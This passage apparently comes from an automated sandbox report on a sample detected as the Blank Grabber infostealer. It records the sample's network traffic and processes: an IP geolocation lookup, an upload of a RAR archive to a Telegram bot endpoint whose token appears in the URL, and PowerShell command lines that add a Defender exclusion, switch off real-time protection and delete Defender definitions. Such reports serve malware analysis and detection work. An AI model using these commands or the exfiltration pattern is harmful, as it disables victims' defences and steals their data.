Aug 4, 2024 02:22:27.754746914 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754791021 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754812002 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754821062 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754841089 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754852057 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754863977 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754882097 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754890919 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754955053 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.754965067 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.754993916 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755018950 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.755090952 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755119085 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755134106 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755147934 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755166054 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755166054 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755178928 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755213022 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.755378962 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755395889 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.755413055 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755428076 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755444050 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755460024 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755460024 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755489111 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755501032 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755516052 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755537987 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755547047 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755553007 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755592108 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.755692959 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755718946 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.755728006 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.764113903 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.764235973 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.764575005 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.764838934 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:27.764930010 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:27.764952898 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:28.590640068 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:28.590665102 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:28.590735912 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:28.590751886 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:28.590797901 CEST	443	57967	149.154.167.220	192.168.2.5
Aug 4, 2024 02:22:28.590878963 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:28.591471910 CEST	57967	443	192.168.2.5	149.154.167.220
Aug 4, 2024 02:22:28.878344059 CEST	57966	80	192.168.2.5	208.95.112.1
Aug 4, 2024 02:22:28.883990049 CEST	80	57966	208.95.112.1	192.168.2.5
Aug 4, 2024 02:22:28.884061098 CEST	57966	80	192.168.2.5	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 4, 2024 02:22:22.229135990 CEST	53	63106	1.1.1.1	192.168.2.5
Aug 4, 2024 02:22:26.407968998 CEST	56723	53	192.168.2.5	1.1.1.1
Aug 4, 2024 02:22:26.414985895 CEST	53	56723	1.1.1.1	192.168.2.5
Aug 4, 2024 02:22:27.102792978 CEST	49344	53	192.168.2.5	1.1.1.1
Aug 4, 2024 02:22:27.109744072 CEST	53	49344	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 4, 2024 02:22:26.407968998 CEST	192.168.2.5	1.1.1.1	0x3adc	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 4, 2024 02:22:27.102792978 CEST	192.168.2.5	1.1.1.1	0xb6cd	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 4, 2024 02:22:26.414985895 CEST	1.1.1.1	192.168.2.5	0x3adc	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 4, 2024 02:22:27.109744072 CEST	1.1.1.1	192.168.2.5	0xb6cd	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	57966	208.95.112.1	80	5260	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Timestamp	Bytes transferred	Direction	Data
Aug 4, 2024 02:22:26.420926094 CEST	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.1.0
Aug 4, 2024 02:22:26.894061089 CEST	379	IN	HTTP/1.1 200 OK Date: Sun, 04 Aug 2024 00:22:26 GMT Content-Type: application/json; charset=utf-8 Content-Length: 202 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	57967	149.154.167.220	443	5260	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-04 00:22:27 UTC	268	OUT	POST /bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 692816 User-Agent: python-urllib3/2.1.0 Content-Type: multipart/form-data; boundary=6d93bc963fb1d0e6724c699c271a2303
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: 2d 2d 36 64 39 33 62 63 39 36 33 66 62 31 64 30 65 36 37 32 34 63 36 39 39 63 32 37 31 61 32 33 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 78 e2 8b 36 21 04 00 00 01 0f a8 fe fa 88 a8 12 ae 8c 16 38 46 a8 07 08 36 09 66 3f 87 7b 72 75 07 de 5d 06 59 25 13 28 d5 2e 25 98 e7 19 5e b8 1f 96 82 0a a0 b4 18 d4 e3 c6 e3 f4 3c 44 54 da 91 5f 43 6e 83 6b 1b dd d4 13 ac 65 4a 1f 0b 3f c5 47 62 56 a1 2f 9e 64 3b a0 c9 Data Ascii: --6d93bc963fb1d0e6724c699c271a2303Content-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!x6!8F6f?{ru]Y%(.%^<DT_CnkeJ?GbV/d;
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: b4 d7 2c 82 29 3e f5 90 49 34 8b 84 34 49 b9 63 28 4c 64 ad 4f 1b 47 c3 eb cb 25 07 28 38 e6 41 a3 c5 b4 97 8d 29 5b d0 4c 1f ec ac 18 a6 da b8 90 17 58 7c 01 ef af 99 ee 90 fa d7 d0 a4 44 1a 48 51 58 c0 2a 9f 0c cd d1 45 de ca 4a d4 35 fd c4 01 56 00 68 ef dc b1 38 06 b4 d0 3d ea 2e ee 3b cd 3c fa db 90 c4 02 7a 56 b7 eb b8 9a 8a aa a1 e7 94 0f 38 0f 0e 4b 5d ae 85 43 ed 4b a1 76 20 c5 26 10 8a cb 47 94 24 8c 8e e2 a1 ad 5c a3 29 b8 71 b1 41 7d 4d 90 c1 aa 1a 31 f3 2c a0 4f 46 5a b1 1b 40 cd d3 c0 5a b9 7a 56 12 59 fa 5b c6 99 3f 19 de b1 bb aa e3 2a e9 61 ba 7e 67 5b a3 c4 96 de 1f 1f 0f 85 17 89 7b 11 11 e3 62 a8 5d ee ff cf 56 e5 3b 49 f5 5b d1 16 d8 3b b9 50 a6 43 7a b2 b5 aa 4b 11 77 fb a6 84 ee 89 cd fc fb 60 9b 2d cc 32 e5 a0 19 50 26 51 ad 27 68 Data Ascii: ,)>I44Ic(LdOG%(8A)[LX\|DHQXEJ5Vh8=.;<zV8K]CKv &G$\)qA}M1,OFZ@ZzVY[?a~g[{b]V;I[;PCzKw`-2P&Q'h
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: 42 60 3d c9 9a ff 26 ab 47 d3 f7 cd a7 5b b0 07 ff ba 27 1d a4 5c b0 75 dc 8f fc d1 39 8b 9b 68 01 0c 6e 34 9e 22 97 dc 11 49 f4 0f 68 a9 ec d0 7d 10 7c 78 a7 65 69 f2 5d 2d 89 4d a2 ed 32 c4 04 19 21 58 e3 a0 52 40 3c 53 6b f4 b0 90 fb eb 32 b2 88 71 6e 8d 11 56 33 18 3c ba 24 9b 93 48 f0 24 37 f5 75 ae b4 4f ba fb 97 eb 7c 72 bf 7a 98 ea 83 76 08 88 17 9b 0a 8b e4 fd c4 de ed f0 dd d2 82 60 26 94 84 d4 93 76 19 b8 df 2e 98 04 0b 0f 05 f4 9e 06 0f 8d 92 cf 00 06 f2 64 78 b6 79 cf a6 12 46 0e 32 af 93 48 88 dd 2a 93 69 94 b3 40 b5 b9 60 70 e1 aa 86 c1 8e 54 30 ab 14 b2 c9 f9 dc e1 39 a1 2c e5 4b 32 d7 81 e9 bc 5a 19 8f 2a 47 ff 82 b5 6c 7e 0b 94 8d e7 ef ad 6d 24 63 b2 67 3f 88 77 f0 10 d1 2d c0 68 b6 8e 7a 19 b2 93 65 7d ce ea 38 dd 10 1d 07 8c e9 de d3 Data Ascii: B`=&G['\u9hn4"Ih}\|xei]-M2!XR@<Sk2qnV3<$H$7uO\|rzv`&v.dxyF2Hi@`pT09,K2ZGl~m$cg?w-hze}8
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: e1 98 91 08 14 8a ab 76 b3 30 df 06 d3 86 8b 1d 0f 54 18 4b 03 57 88 ed b8 9b 63 ae 9d 3e 17 95 c8 0c 4e c7 db 5f b6 e1 07 8b 22 90 35 d6 7c c0 d9 96 ed c4 64 fa 3a 7b 4b d5 1d b0 42 d6 b0 63 ed f2 9e 5d 2f 9b 44 99 0b 88 f3 6d b3 81 a3 bc 78 5e 72 fc e2 c8 cd 8f 57 8a 77 f6 48 02 21 6f 8d 58 2e 56 11 81 cf f4 7b ba f0 6b fd 7e 43 44 80 d0 52 56 66 48 7c 29 fd 85 6b c2 e1 52 38 66 d0 21 c0 af 01 6c 9a b7 3d 68 8f 22 83 49 88 03 d2 9e ef 40 ea 0c 40 13 0f 8d 41 00 20 17 41 fd ee 2c a7 94 8b ed 10 37 73 a0 e3 4b 58 70 bc dd 35 74 6b 7d ab 26 b9 39 f7 21 ad 3c 02 74 b8 96 fd 2e 29 21 22 1a d9 bc c8 97 c0 e5 64 10 4f 15 0f 02 e0 ce e0 23 b1 91 d6 63 b7 26 c9 ed 05 dd d3 ab 48 b0 14 3d a4 d2 73 e8 0f e3 0d 5f 04 ac f0 a1 c6 75 93 38 82 47 cc e3 6e 5c f2 95 ff Data Ascii: v0TKWc>N_"5\|d:{KBc]/Dmx^rWwH!oX.V{k~CDRVfH\|)kR8f!l=h"I@@A A,7sKXp5tk}&9!<t.)!"dO#c&H=s_u8Gn\
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: 52 83 48 e2 e1 09 df 41 1f 83 d6 50 b1 3c 62 01 44 93 b0 0d be 01 3a 94 49 5c 76 20 40 40 05 c8 d4 52 db 73 be 19 2c 61 01 5c 9e fa 89 64 a9 8e b0 aa ca fa 38 e3 4a b5 0d a6 b9 7a 52 37 9c ab 9c 9d fa 3a 15 a1 93 50 73 2f 59 3f 8b e9 6c f4 e3 29 c2 68 5e a3 76 9c 40 42 99 64 07 bb ee 1c 76 9a 6b 8d b6 e4 b0 a8 90 c0 94 75 e0 85 6d ec 7c a0 9b 9a 3c 55 eb c3 4c 07 f7 91 a9 f0 2d 9d c6 fa 6e fc e1 a0 15 cc 77 9b bb 97 2b 26 f8 e9 7e 41 bf 9e f0 2a 60 9d 6d 78 0b 59 e6 9e 48 98 b8 66 59 06 69 1b 4c d4 91 36 cb 02 46 65 d5 ba fc 66 a4 58 01 14 69 55 a4 69 8c 19 94 9b 74 af c7 ab 10 86 3f f1 bf e7 45 84 88 3e fc fe 45 d5 b3 95 b1 08 71 ee d8 b3 99 c4 f4 8f c9 17 43 40 8d 61 60 cd 1e 95 df 67 be c0 49 20 d0 89 69 33 ff b3 86 61 3d e3 12 f3 ea a8 c5 6d 33 a0 bc Data Ascii: RHAP<bD:I\v @@Rs,a\d8JzR7:Ps/Y?l)h^v@Bdvkum\|<UL-nw+&~A*`mxYHfYiL6FefXiUit?E>EqC@a`gI i3a=m3
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: 0e cf dd e1 a1 a6 f6 cc dd 65 e3 22 41 7b 0e ed 87 94 8c 9d dd 37 b0 31 2c 0d 52 23 9c 7b cb 29 f3 6d 23 79 fa 9a f1 de fb 78 53 6e 44 12 c6 5c ab e0 10 01 2b 61 94 b0 41 c3 14 47 d2 e0 f6 df cf 89 a5 76 a1 00 12 cd a0 af 15 8f 8a a6 e4 30 f7 c2 d5 28 65 14 b6 0b de 86 24 34 a3 78 a4 96 d9 0e be 7f f8 5e c0 57 7a a0 06 e7 9c 08 25 65 c3 77 ae e5 e9 1e 5e 81 6c 88 a1 72 28 5d c4 34 54 25 94 d1 16 a2 e6 75 c9 17 b5 1a 6d fb 51 40 1a 95 1b 74 1f 13 d6 f0 97 07 c2 9a ef c0 cb 53 90 79 b1 6a 00 05 8a cd 9d 2a 45 d4 f2 0b 08 b1 6c fa 42 59 b5 74 73 17 6b 9b 21 1d 07 63 e5 10 50 c8 00 63 fd 7f 53 3d 6d 83 75 c4 13 91 83 da 7c 51 db f6 cb d1 01 ec 1c 22 94 9e ca 28 95 fa 41 5f f7 51 ad b9 4c f4 9f 84 25 44 5e 5b 0b 31 d2 7d 17 28 41 5a df f4 a3 d4 27 ae e4 be 67 Data Ascii: e"A{71,R#{)m#yxSnD\+aAGv0(e$4x^Wz%ew^lr(]4T%umQ@tSyj*ElBYtsk!cPcS=mu\|Q"(A_QL%D^[1}(AZ'g
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: dc 54 27 61 61 b1 da a8 59 5e 1d bb 00 1f 23 4d 48 19 48 3f a3 ca 42 84 0a 0e 2f 8c d3 86 43 17 23 6e eb ef c0 52 c6 de ed dc 61 69 35 b9 8b b9 da 48 23 4e 62 1d fb 7b bc d2 5e f2 6c 8e ba cf 62 d6 1c 4a ae 0f 81 bc 5a 75 ae 2d ad bb a3 f2 ee 0c 33 ad 3e 76 bf a4 dc ff 7a a1 3b 79 82 50 0b 68 a7 b2 15 89 56 36 fb 3d 92 c7 51 ea 5a 9b 59 9b ef 3f 5d 45 9b c9 b3 53 f5 14 2d 9d 3a 97 7f 46 c3 ae 12 aa bb 3d 9c a6 fb dc 4a 21 55 f4 f3 97 2b b7 3e fb b2 3e 94 57 46 43 1b 36 48 96 5f ff bd de ab 36 9d 5b b2 ae b4 96 b8 9f 70 34 95 0d aa 39 ed 4c bd 8b 34 fa 1b b9 ca a3 a5 74 7c c4 64 47 a2 9f fb 16 57 2f c4 5e 71 cb 76 86 70 c7 4e 9a ee 67 cd 00 29 69 76 42 7f c8 5f 3f 27 93 1a 2b 2d fb 45 44 82 20 17 0d c6 ce 58 43 0c 83 7a af 69 42 67 af 31 fd b6 88 7f 7e c2 Data Ascii: T'aaY^#MHH?B/C#nRai5H#Nb{^lbJZu-3>vz;yPhV6=QZY?]ES-:F=J!U+>>WFC6H_6[p49L4t\|dGW/^qvpNg)ivB_?'+-ED XCziBg1~
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: 61 90 5c 00 47 2b 5c 06 e5 e5 40 bc 6d cf a1 32 5e d1 c6 6a 80 43 66 2e e3 12 32 a5 f8 2a be 12 c9 4e b8 a8 85 aa be be b2 45 54 aa 5d a1 90 c4 d0 27 a7 0d 2c 8f b5 bc d1 1f 1d 26 ba b1 55 8d 62 50 5f 7b c7 26 c5 03 24 66 f3 e7 91 95 59 bd c7 6d 6c 49 0d 53 c7 e6 6a 27 99 05 33 7d 54 15 66 7c be 54 ab 55 7d 4f a4 ef 37 66 aa 37 aa 98 2c 0e dc d5 e4 79 a0 ae 67 fc c9 05 1a 68 c2 57 33 f8 07 54 44 f9 dd 19 8d b1 29 61 ad 9c 3a b9 a3 d3 2d 9f 27 b6 0f 88 36 2b dc 1e 9d 55 ad f7 31 a6 8f fc c2 d1 c9 74 f4 e6 af 42 df 73 d7 05 39 fc 4b 5d c0 00 39 02 70 3d d0 f3 e2 4e b1 dd 0b f9 90 0d c1 61 8d 0f c9 7a b0 03 3f ee 44 f6 a0 64 e5 f3 5a 1c fd ba f5 bd 6c 8d 27 1d bb 8b 19 17 d3 5f b1 94 d5 52 d5 32 6c 9d 7b d3 e1 b5 2d b1 29 13 cb b8 47 ec 7d 0b 0d 75 e2 58 39 Data Ascii: a\G+\@m2^jCf.2*NET]',&UbP_{&$fYmlISj'3}Tf\|TU}O7f7,yghW3TD)a:-'6+U1tBs9K]9p=Naz?DdZl'_R2l{-)G}uX9
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: 64 49 22 85 1c 9e 8d 71 26 e9 4e 64 1b 72 59 f7 d6 36 8f 40 c5 9b e1 92 a6 b0 93 94 c1 34 fb 4c 18 5a 46 3f af dc a8 9d f2 ca 99 26 dd ad 40 8d 40 22 69 fd bc 19 1a c3 98 73 96 c2 4f 85 b4 79 98 4c b3 d6 0d 96 f5 56 46 34 ba 7d a4 01 db f0 d0 02 60 71 9c df 7b a7 55 fc d0 7e 92 77 fd b2 b2 c0 99 17 2e 50 18 6c 32 4f 57 64 ac b9 41 f1 3b 15 c6 c4 b4 67 28 17 f7 01 c3 da d6 49 65 7b c5 de 96 5e 99 d0 0e 22 09 62 9e e8 21 3c d5 0c d1 f7 9a 24 92 fb 47 4a 0f d8 bb d3 42 e5 71 87 26 82 7f 69 1b bd 6c 3e 05 2d af 3a 56 96 2c 42 dc b9 15 72 37 2d dc b9 72 84 b8 75 39 6f e0 ab 51 eb d0 81 d3 a2 1e 04 33 7e fa af 57 cc 0e ef 99 f1 eb d3 96 8f 8c 87 43 0f 77 62 16 43 a8 7e 0d c0 7b fc 54 3a e5 5f e1 23 f8 1e a7 49 98 42 5d 15 05 49 36 e6 f4 27 fc 6b ae 32 68 d4 f3 Data Ascii: dI"q&NdrY6@4LZF?&@@"isOyLVF4}`q{U~w.Pl2OWdA;g(Ie{^"b!<$GJBq&il>-:V,Br7-ru9oQ3~WCwbC~{T:_#IB]I6'k2h
2024-08-04 00:22:27 UTC	16384	OUT	Data Raw: f1 23 a8 a4 3e 2f 8f 3b a8 e7 1a b7 89 35 19 f7 8b fc 17 67 be 73 16 32 c7 2a a2 ef 12 66 69 48 48 72 20 51 e7 f1 76 de fa f5 15 e7 34 e0 19 5f ee 6c a8 ac 73 2e 67 92 97 8b bc 1b 13 8b 33 82 db 60 ee 02 0d e8 dc c5 2c d8 af 94 6c a2 d7 1e 48 d4 53 7d 7c 3f 85 b0 82 e3 65 69 f2 98 04 0d 03 d9 cf cf ec 2d cb f9 12 e3 e2 a7 0b f4 18 ee 50 1a a0 aa 2f 6f 0a ac b5 91 94 db 96 15 88 47 03 f5 e0 58 88 b1 97 b5 50 25 b9 ba dc c4 3e 70 8d a5 d8 93 00 2a e7 fc 90 03 c6 66 52 0a 65 6c d6 27 e2 7f 42 e5 7a 44 af ee 5a 91 b1 ad 86 c0 f1 32 ab e6 cf e6 16 77 9c 01 b1 a4 3f c0 9a b3 c2 28 a0 44 a4 d4 bf c6 44 ea f1 36 23 c2 df 6a b5 69 70 64 fa 9e e5 3c 0a f1 11 f8 44 18 d8 8d 54 d4 cd 66 86 50 a4 7b c6 6e 48 ec ba 79 d1 2f 5e b8 ef 1a a3 70 fd cb 6b 67 5c 4a f5 d6 33 Data Ascii: #>/;5gs2fiHHr Qv4_ls.g3`,lHS}\|?ei-P/oGXP%>pfRel'BzDZ2w?(DD6#jipd<DTfP{nHy/^pkg\J3
2024-08-04 00:22:28 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sun, 04 Aug 2024 00:22:28 GMT Content-Type: application/json Content-Length: 1693 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	20:21:58
Start date:	03/08/2024
Path:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Imagebase:	0x7ff73ae10000
File size:	8'505'922 bytes
MD5 hash:	D87B402B821FA842D89283AA8654D9C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:22:00
Start date:	03/08/2024
Path:	C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe"
Imagebase:	0x7ff73ae10000
File size:	8'505'922 bytes
MD5 hash:	D87B402B821FA842D89283AA8654D9C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
